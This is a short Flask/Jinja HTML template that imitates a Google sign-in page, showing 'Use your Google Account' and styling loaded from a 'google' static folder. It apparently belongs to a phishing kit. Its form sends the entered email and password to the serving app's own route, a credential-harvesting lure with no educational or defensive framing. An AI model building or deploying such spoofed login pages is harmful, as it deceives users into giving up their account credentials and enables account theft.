

{% block head%} 
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='../../static/google/css/main.css') }}">
    <style>

</style>
</head>

{% endblock %}

{% block body %} 

<body>
        <div class="box">
                <h2>Sign in</h2>
                <p>Use your Google Account</p>
                <form action="/" method="POST">
                  <div class="inputBox">
                    <input type="email" name="username" required onkeyup="this.setAttribute('value', this.value);"  value="">
                    <label>Username</label>
                  </div>
                  <div class="inputBox">
                        <input type="text" name="password" required onkeyup="this.setAttribute('value', this.value);" value="">
                        <label>Passward</label>
                      </div>
                  <input type="submit" name="sign-in" value="Sign In">
                </form>
              </div>
</body>

{% endblock %}